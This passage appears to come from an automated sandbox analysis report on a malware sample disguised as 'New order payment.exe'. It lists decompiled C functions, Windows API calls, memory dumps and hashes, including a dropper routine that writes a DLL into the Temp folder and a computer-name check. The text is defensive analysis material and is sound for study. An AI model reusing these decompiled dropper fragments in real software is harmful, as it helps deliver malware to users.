                                                                0x00403952
                                                                0x00403957
                                                                0x0040395f
                                                                0x00403980
                                                                0x00403980
                                                                0x00403980
                                                                0x00403961
                                                                0x00403963
                                                                0x00403963
                                                                0x00403967
                                                                0x0040396a
                                                                0x0040396e
                                                                0x0040396e
                                                                0x00403973
                                                                0x00403979
                                                                0x00403979
                                                                0x00000000
                                                                0x00403963
                                                                0x00403917
                                                                0x0040391c
                                                                0x00403925
                                                                0x0040391e
                                                                0x0040391e
                                                                0x0040391e
                                                                0x0040391c

                                                                APIs
                                                                • SetWindowTextA.USER32(00000000,ebykawqyaa Setup), ref: 0040394C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.244114325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.244110727.0000000000400000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244120939.0000000000407000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244125832.0000000000409000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244135351.0000000000417000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244139323.0000000000422000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244144896.000000000042A000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244148657.000000000042D000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: TextWindow
                                                                • String ID: "C:\Users\user\Desktop\New order payment.exe" $1033$ebykawqyaa Setup
                                                                • API String ID: 530164218-1813293190
                                                                • Opcode ID: efc42492ee7b8a51a3ec7fa34d8682ca64c79934ee229eb602048578ff3af0eb
                                                                • Instruction ID: 9405f6c8d043b7fcf606726b90d8bdb5e10644d2b1bbff0bcd5da451eaf68503
                                                                • Opcode Fuzzy Hash: efc42492ee7b8a51a3ec7fa34d8682ca64c79934ee229eb602048578ff3af0eb
                                                                • Instruction Fuzzy Hash: D211CFB1F006119BC7349F15E88093777BDEB89716369817FE801A73E0D67DAE029A98
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0040568B, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E0040568B(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409010);
				}
				return _t7;
			}




                                                                0x0040568c
                                                                0x004056a3
                                                                0x004056ab
                                                                0x004056ab
                                                                0x004056b3

                                                                APIs
                                                                • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405691
                                                                • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 0040569A
                                                                • lstrcatA.KERNEL32(?,00409010), ref: 004056AB
                                                                Strings
                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 0040568B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.244114325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.244110727.0000000000400000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244120939.0000000000407000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244125832.0000000000409000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244135351.0000000000417000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244139323.0000000000422000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244144896.000000000042A000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244148657.000000000042D000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: CharPrevlstrcatlstrlen
                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                • API String ID: 2659869361-823278215
                                                                • Opcode ID: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                                                                • Instruction ID: e5ee9c2d52b027f92723a61f0ff242ac356e57f7af316d882355b101730f0027
                                                                • Opcode Fuzzy Hash: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                                                                • Instruction Fuzzy Hash: 05D0A972606A302AE60227158C09F8B3A2CCF02321B040462F540B6292C2BC7D818BEE
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00401D38, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 67%
                                                                			E00401D38() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
				0x40b014->lfHeight =  ~(MulDiv(E00402A0C(2), _t6, 0x48));
				 *0x40b024 = E00402A0C(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x18));
				 *0x40b02b = 1;
				 *0x40b028 = _t11 & 0x00000001;
				 *0x40b029 = _t11 & 0x00000002;
				 *0x40b02a = _t11 & 0x00000004;
				E00405BBA(_t18, _t24, _t26, 0x40b030,  *((intOrPtr*)(_t28 - 0x24)));
				_t14 = CreateFontIndirectA(0x40b014);
				_push(_t14);
				_push(_t26);
				E00405AF6();
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}











                                                                0x00401d46
                                                                0x00401d5f
                                                                0x00401d69
                                                                0x00401d6e
                                                                0x00401d79
                                                                0x00401d80
                                                                0x00401d92
                                                                0x00401d98
                                                                0x00401d9d
                                                                0x00401da7
                                                                0x004024eb
                                                                0x00401561
                                                                0x00402866
                                                                0x004028c1
                                                                0x004028cd

                                                                APIs
                                                                • GetDC.USER32(?), ref: 00401D3F
                                                                • GetDeviceCaps.GDI32(00000000), ref: 00401D46
                                                                • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D55
                                                                • CreateFontIndirectA.GDI32(0040B014), ref: 00401DA7
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.244114325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.244110727.0000000000400000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244120939.0000000000407000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244125832.0000000000409000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244135351.0000000000417000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244139323.0000000000422000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244144896.000000000042A000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244148657.000000000042D000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: CapsCreateDeviceFontIndirect
                                                                • String ID:
                                                                • API String ID: 3272661963-0
                                                                • Opcode ID: 91a73ead397859bf4c0615e863a468d78fcadc575e8fb258f1077711b7347c7d
                                                                • Instruction ID: 0c2e595a2d755a053b7cc3d6c09569b1e3f8f946256c05fe5e222a6b1ed621d0
                                                                • Opcode Fuzzy Hash: 91a73ead397859bf4c0615e863a468d78fcadc575e8fb258f1077711b7347c7d
                                                                • Instruction Fuzzy Hash: B0F0C870E48280AFE70157705F0ABAB3F64D715305F100876F251BA2E3C7B910088BAE
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00402BF1, Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E00402BF1(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x4170e0; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x423f4c;
						if(_t2 >  *0x423f4c) {
							_t3 = CreateDialogParamA( *0x423f40, 0x6f, 0, E00402B6E, 0);
							 *0x4170e0 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00405F64(0);
					}
				} else {
					_t6 =  *0x4170e0; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x4170e0 = 0;
					return _t6;
				}
			}






                                                                0x00402bf8
                                                                0x00402c12
                                                                0x00402c18
                                                                0x00402c22
                                                                0x00402c28
                                                                0x00402c2e
                                                                0x00402c3f
                                                                0x00402c48
                                                                0x00000000
                                                                0x00402c4d
                                                                0x00402c54
                                                                0x00402c1a
                                                                0x00402c21
                                                                0x00402c21
                                                                0x00402bfa
                                                                0x00402bfa
                                                                0x00402c01
                                                                0x00402c04
                                                                0x00402c04
                                                                0x00402c0a
                                                                0x00402c11
                                                                0x00402c11

                                                                APIs
                                                                • DestroyWindow.USER32(00000000,00000000,00402DD1,00000001), ref: 00402C04
                                                                • GetTickCount.KERNEL32 ref: 00402C22
                                                                • CreateDialogParamA.USER32(0000006F,00000000,00402B6E,00000000), ref: 00402C3F
                                                                • ShowWindow.USER32(00000000,00000005), ref: 00402C4D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.244114325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.244110727.0000000000400000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244120939.0000000000407000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244125832.0000000000409000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244135351.0000000000417000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244139323.0000000000422000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244144896.000000000042A000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244148657.000000000042D000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                • String ID:
                                                                • API String ID: 2102729457-0
                                                                • Opcode ID: 368aa0899d27fe077c31989b75da56c4405109c76bea3f602025cb1c6477c4a6
                                                                • Instruction ID: 902fecb1894dce430947e24fe85b059bfb73d5b7bbd16117cdf5d745fa908bfb
                                                                • Opcode Fuzzy Hash: 368aa0899d27fe077c31989b75da56c4405109c76bea3f602025cb1c6477c4a6
                                                                • Instruction Fuzzy Hash: 37F03030A09321ABC611EF60BE4CA9E7B74F748B417118576F201B11A4CB7858818B9D
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 73222090, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 186COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 41%
                                                                			E73222090(intOrPtr* _a4, char* _a8, int* _a12, intOrPtr _a16) {
				short* _v8;
				short* _v12;
				signed int _v16;
				int _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				short* _t83;
				intOrPtr _t95;
				intOrPtr _t97;
				intOrPtr _t99;
				intOrPtr _t101;
				intOrPtr _t103;
				void* _t135;
				void* _t136;

				_v8 = 0xc0000bbb;
				0x73220000("%p %p %p 0x%08x\n", _a4, _a8, _a12, _a16);
				_t136 = _t135 + 0x14;
				if(_a4 == 0 || _a12 == 0) {
					return 0xc0000bbd;
				}
				_v44 = 0;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v28 = 0;
				_v24 = 0;
				if( *_a4 == 0) {
					L6:
					if( *((intOrPtr*)(_a4 + 4)) == 0) {
						L9:
						if( *((intOrPtr*)(_a4 + 8)) == 0) {
							L12:
							if( *((intOrPtr*)(_a4 + 0xc)) == 0) {
								L15:
								if( *((intOrPtr*)(_a4 + 0x14)) == 0) {
									L18:
									_v28 =  *((intOrPtr*)(_a4 + 0x10));
									_v16 = 0;
									_t83 = E73221EA0( &_v44, 0,  &_v16, _a16);
									_v8 = _t83;
									if(_v8 == 0x800007d2) {
										0x73220000(_v16 << 1);
										_t136 = _t136 + 4;
										_v12 = _t83;
										if(_v12 == 0) {
											_v8 = 0xc0000bbb;
										} else {
											_v8 = E73221EA0( &_v44, _v12,  &_v16, _a16);
											if(_v8 == 0) {
												_v20 = WideCharToMultiByte(0, 0, _v12, 0xffffffff, 0, 0, 0, 0);
												if( *_a12 < _v20) {
													_v8 = 0x800007d2;
												} else {
													WideCharToMultiByte(0, 0, _v12, 0xffffffff, _a8,  *_a12, 0, 0);
												}
												 *_a12 = _v20;
											}
											0x73220000(_v12);
											_t136 = _t136 + 4;
										}
									}
									L27:
									0x73220000(_v44);
									0x73220000(_v40);
									0x73220000(_v36);
									0x73220000(_v32);
									0x73220000(_v24);
									return _v8;
								}
								_t95 = E73222B80( *((intOrPtr*)(_a4 + 0x14)));
								_t136 = _t136 + 4;
								_v24 = _t95;
								if(_v24 != 0) {
									goto L18;
								}
								goto L27;
							}
							_t97 = E73222B80( *((intOrPtr*)(_a4 + 0xc)));
							_t136 = _t136 + 4;
							_v32 = _t97;
							if(_v32 != 0) {
								goto L15;
							}
							goto L27;
						}
						_t99 = E73222B80( *((intOrPtr*)(_a4 + 8)));
						_t136 = _t136 + 4;
						_v36 = _t99;
						if(_v36 != 0) {
							goto L12;
						}
						goto L27;
					}
					_t101 = E73222B80( *((intOrPtr*)(_a4 + 4)));
					_t136 = _t136 + 4;
					_v40 = _t101;
					if(_v40 != 0) {
						goto L9;
					}
					goto L27;
				}
				_t103 = E73222B80( *_a4);
				_t136 = _t136 + 4;
				_v44 = _t103;
				if(_v44 != 0) {
					goto L6;
				}
				goto L27;
			}





















                                                                0x73222096
                                                                0x732220b2
                                                                0x732220b7
                                                                0x732220be
                                                                0x00000000
                                                                0x732220c6
                                                                0x732220d2
                                                                0x732220d5
                                                                0x732220d8
                                                                0x732220db
                                                                0x732220de
                                                                0x732220e1
                                                                0x732220ea
                                                                0x73222108
                                                                0x7322210f
                                                                0x7322212e
                                                                0x73222135
                                                                0x73222154
                                                                0x7322215b
                                                                0x7322217a
                                                                0x73222181
                                                                0x732221a0
                                                                0x732221a6
                                                                0x732221a9
                                                                0x732221be
                                                                0x732221c3
                                                                0x732221cd
                                                                0x732221d9
                                                                0x732221de
                                                                0x732221e1
                                                                0x732221e8
                                                                0x7322226e
                                                                0x732221ee
                                                                0x73222203
                                                                0x7322220a
                                                                0x73222224
                                                                0x7322222f
                                                                0x73222251
                                                                0x73222231
                                                                0x73222249
                                                                0x73222249
                                                                0x7322225e
                                                                0x7322225e
                                                                0x73222264
                                                                0x73222269
                                                                0x73222269
                                                                0x732221e8
                                                                0x73222275
                                                                0x73222279
                                                                0x73222285
                                                                0x73222291
                                                                0x7322229d
                                                                0x732222a9
                                                                0x00000000
                                                                0x732222b1
                                                                0x7322218a
                                                                0x7322218f
                                                                0x73222192
                                                                0x73222199
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x7322219b
                                                                0x73222164
                                                                0x73222169
                                                                0x7322216c
                                                                0x73222173
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x73222175
                                                                0x7322213e
                                                                0x73222143
                                                                0x73222146
                                                                0x7322214d
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x7322214f
                                                                0x73222118
                                                                0x7322211d
                                                                0x73222120
                                                                0x73222127
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x73222129
                                                                0x732220f2
                                                                0x732220f7
                                                                0x732220fa
                                                                0x73222101
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.247725746.0000000073221000.00000020.00020000.sdmp, Offset: 73220000, based on PE: true
                                                                • Associated: 00000000.00000002.247720546.0000000073220000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247732759.0000000073224000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247739404.0000000073225000.00000040.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247749678.0000000073227000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %p %p %p 0x%08x
                                                                • API String ID: 0-2106592379
                                                                • Opcode ID: a11cd5a0e7bb9b390b0a622693e818e59b2ffd8eee00f141ac4e2cf4154d53a3
                                                                • Instruction ID: 1a5a86d328ce861e51be24309e32aeb36287de83303014ab31cfc21e7b11a2f4
                                                                • Opcode Fuzzy Hash: a11cd5a0e7bb9b390b0a622693e818e59b2ffd8eee00f141ac4e2cf4154d53a3
                                                                • Instruction Fuzzy Hash: EF712AB590430DEFEB44CF94DC40FDEBB75AB48306F158658E9056B281D776EA80CB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 73222560, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 37%
                                                                			E73222560(intOrPtr _a4, intOrPtr _a8, char* _a12, int* _a16) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				char _v20;
				short _v2068;
				short* _t32;
				intOrPtr _t33;
				int _t44;
				void* _t58;
				void* _t61;

				_v8 = 0;
				_t32 =  &_v2068;
				0x73220000(_t32);
				_v20 = _t32;
				_t33 = _a8;
				0x73220000(_a4, _t33, _a12, _a16);
				0x73220000("%s %d %p %p\n", _t33);
				_t61 = _t58 + 0x1c;
				if(_a12 == 0 || _a16 == 0) {
					return 0xc0000bbd;
				} else {
					if(_a4 == 0) {
						L6:
						_v16 = E73222440(_v8, _a8,  &_v2068,  &_v20);
						if(_v16 == 0) {
							_v12 = WideCharToMultiByte(0, 0,  &_v2068, 0xffffffff, 0, 0, 0, 0);
							if( *_a16 >= _v12) {
								WideCharToMultiByte(0, 0,  &_v2068, 0xffffffff, _a12, _v12, 0, 0);
							} else {
								_v16 = 0x800007d2;
							}
							 *_a16 = _v12;
						}
						0x73220000(_v8);
						return _v16;
					}
					_t44 = E73222B80(_a4);
					_t61 = _t61 + 4;
					_v8 = _t44;
					if(_v8 != 0) {
						goto L6;
					}
					return 0xc0000bbb;
				}
			}













                                                                0x73222569
                                                                0x73222570
                                                                0x73222577
                                                                0x7322257f
                                                                0x7322258a
                                                                0x73222592
                                                                0x732225a0
                                                                0x732225a5
                                                                0x732225ac
                                                                0x00000000
                                                                0x732225be
                                                                0x732225c2
                                                                0x732225e3
                                                                0x732225fb
                                                                0x73222602
                                                                0x7322261f
                                                                0x7322262a
                                                                0x7322264e
                                                                0x7322262c
                                                                0x7322262c
                                                                0x7322262c
                                                                0x7322265a
                                                                0x7322265a
                                                                0x73222660
                                                                0x00000000
                                                                0x73222668
                                                                0x732225c8
                                                                0x732225cd
                                                                0x732225d0
                                                                0x732225d7
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x732225d9

                                                                APIs
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 73222619
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 7322264E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.247725746.0000000073221000.00000020.00020000.sdmp, Offset: 73220000, based on PE: true
                                                                • Associated: 00000000.00000002.247720546.0000000073220000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247732759.0000000073224000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247739404.0000000073225000.00000040.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247749678.0000000073227000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: ByteCharMultiWide
                                                                • String ID: %s %d %p %p
                                                                • API String ID: 626452242-2135802371
                                                                • Opcode ID: e47b05b98b3e070364d744621edbdaaf766f204f86308fb14685bd9d3a4a5158
                                                                • Instruction ID: 42bd5e2734227529d8d682a2bc23e2b2d6cba2d52946c6d9ed95abf979a62923
                                                                • Opcode Fuzzy Hash: e47b05b98b3e070364d744621edbdaaf766f204f86308fb14685bd9d3a4a5158
                                                                • Instruction Fuzzy Hash: 01313CB690020CAFEB04DF94CC44FAE7BB9AB08305F118559B915A72C0D7B5AA95CF91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00404DD4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E00404DD4(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x420520 != _t22) {
							 *0x420520 = _t22;
							E00405B98(0x420538, 0x425000);
							E00405AF6(0x425000, _t22);
							E0040140B(6);
							E00405B98(0x425000, 0x420538);
						}
						L11:
						return CallWindowProcA( *0x420528, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E00404753(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403EA0(0x413);
				return 0;
			}




                                                                0x00404de0
                                                                0x00404e05
                                                                0x00404e25
                                                                0x00404e28
                                                                0x00404e2b
                                                                0x00404e42
                                                                0x00404e48
                                                                0x00404e4f
                                                                0x00404e56
                                                                0x00404e5d
                                                                0x00404e62
                                                                0x00404e68
                                                                0x00000000
                                                                0x00404e78
                                                                0x00404e12
                                                                0x00404e65
                                                                0x00404e65
                                                                0x00000000
                                                                0x00404e65
                                                                0x00404e1e
                                                                0x00404e20
                                                                0x00000000
                                                                0x00404e20
                                                                0x00404de6
                                                                0x00000000
                                                                0x00000000
                                                                0x00404ded
                                                                0x00000000

                                                                APIs
                                                                • IsWindowVisible.USER32(?), ref: 00404E0A
                                                                • CallWindowProcA.USER32 ref: 00404E78
                                                                  • Part of subcall function 00403EA0: SendMessageA.USER32 ref: 00403EB2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.244114325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.244110727.0000000000400000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244120939.0000000000407000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244125832.0000000000409000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244135351.0000000000417000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244139323.0000000000422000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244144896.000000000042A000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244148657.000000000042D000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: Window$CallMessageProcSendVisible
                                                                • String ID:
                                                                • API String ID: 3748168415-3916222277
                                                                • Opcode ID: d178a5782ca8d626d003a390d0a002469a0ac64d132e68a5e4d1ef6bfeb92247
                                                                • Instruction ID: 907b3508a45335f305929b628defbf7950d0c65962cf50d158fef9db48df65ea
                                                                • Opcode Fuzzy Hash: d178a5782ca8d626d003a390d0a002469a0ac64d132e68a5e4d1ef6bfeb92247
                                                                • Instruction Fuzzy Hash: 3B11BF71600208BFDF21AF61DC4099B3769BF843A5F40803BF604791A2C7BC4991DFA9
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 73222CE0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 16%
                                                                			E73222CE0(intOrPtr _a4, intOrPtr _a8) {
				long _v8;
				intOrPtr _v12;
				short _v44;
				long _t13;
				intOrPtr _t17;

				_t13 =  &_v44;
				0x73220000(_t13);
				_v8 = _t13;
				if(GetComputerNameW( &_v44,  &_v8) != 0) {
					if(_a8 != _v8) {
						L5:
						_v12 = 0;
						L6:
						return _v12;
					}
					_t17 = _a4;
					__imp___wcsnicmp(_t17,  &_v44, _v8);
					if(_t17 != 0) {
						goto L5;
					}
					_v12 = 1;
					goto L6;
				}
				return 0;
			}








                                                                0x73222ce6
                                                                0x73222cea
                                                                0x73222cf2
                                                                0x73222d05
                                                                0x73222d11
                                                                0x73222d35
                                                                0x73222d35
                                                                0x73222d3c
                                                                0x00000000
                                                                0x73222d3c
                                                                0x73222d1b
                                                                0x73222d1f
                                                                0x73222d2a
                                                                0x00000000
                                                                0x00000000
                                                                0x73222d2c
                                                                0x00000000
                                                                0x73222d2c
                                                                0x00000000

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.247725746.0000000073221000.00000020.00020000.sdmp, Offset: 73220000, based on PE: true
                                                                • Associated: 00000000.00000002.247720546.0000000073220000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247732759.0000000073224000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247739404.0000000073225000.00000040.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247749678.0000000073227000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: ComputerName_wcsnicmp
                                                                • String ID: P~)u
                                                                • API String ID: 657830731-3490680764
                                                                • Opcode ID: 9dbe6e13a5c6a841b461547cbf9d15fc171c6efe47db00e96ee6de91293c5f48
                                                                • Instruction ID: ab4d03ba4e0ed770ba46dafa33719010edf830f3c2169d75d5e2a822db73f0e2
                                                                • Opcode Fuzzy Hash: 9dbe6e13a5c6a841b461547cbf9d15fc171c6efe47db00e96ee6de91293c5f48
                                                                • Instruction Fuzzy Hash: DCF04FB290020CEBCB01DFE0CD84BCEBBB9AB08305F158954E905AB244E735E7C88B61
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 004024F1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E004024F1(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x20)) == __ebx) {
					_t7 = lstrlenA(E00402A29(0x11));
				} else {
					E00402A0C(1);
					 *0x40a010 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E00405B0F(_t17 + 8, _t15), "C:\Users\alfons\AppData\Local\Temp\nspE59E.tmp\fsfowpfjd.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}









                                                                0x004024f1
                                                                0x004024f1
                                                                0x004024f4
                                                                0x0040250f
                                                                0x004024f6
                                                                0x004024f8
                                                                0x004024fd
                                                                0x00402504
                                                                0x00402516
                                                                0x0040268f
                                                                0x0040268f
                                                                0x0040251c
                                                                0x0040252e
                                                                0x004015a6
                                                                0x004015a8
                                                                0x00000000
                                                                0x004015ae
                                                                0x004015a8
                                                                0x004028c1
                                                                0x004028cd

                                                                APIs
                                                                • lstrlenA.KERNEL32(00000000,00000011), ref: 0040250F
                                                                • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nspE59E.tmp\fsfowpfjd.dll,00000000,?,?,00000000,00000011), ref: 0040252E
                                                                Strings
                                                                • C:\Users\user\AppData\Local\Temp\nspE59E.tmp\fsfowpfjd.dll, xrefs: 004024FD, 00402522
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.244114325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.244110727.0000000000400000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244120939.0000000000407000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244125832.0000000000409000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244135351.0000000000417000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244139323.0000000000422000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244144896.000000000042A000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244148657.000000000042D000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: FileWritelstrlen
                                                                • String ID: C:\Users\user\AppData\Local\Temp\nspE59E.tmp\fsfowpfjd.dll
                                                                • API String ID: 427699356-1421898716
                                                                • Opcode ID: 5c36ca9ac26024871935510d0a87e67fb519006a7f000f4bdfc66cd9c3aad0f4
                                                                • Instruction ID: 6775f3f9e4e00d505f4e1783fd87b496617f08e9b0a5c20f68d0788d80e55df2
                                                                • Opcode Fuzzy Hash: 5c36ca9ac26024871935510d0a87e67fb519006a7f000f4bdfc66cd9c3aad0f4
                                                                • Instruction Fuzzy Hash: F9F08971A44244BFD710EFA49E49AEF7668DB40348F10043BF141F51C2D6FC5641966E
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 004053F8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E004053F8(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
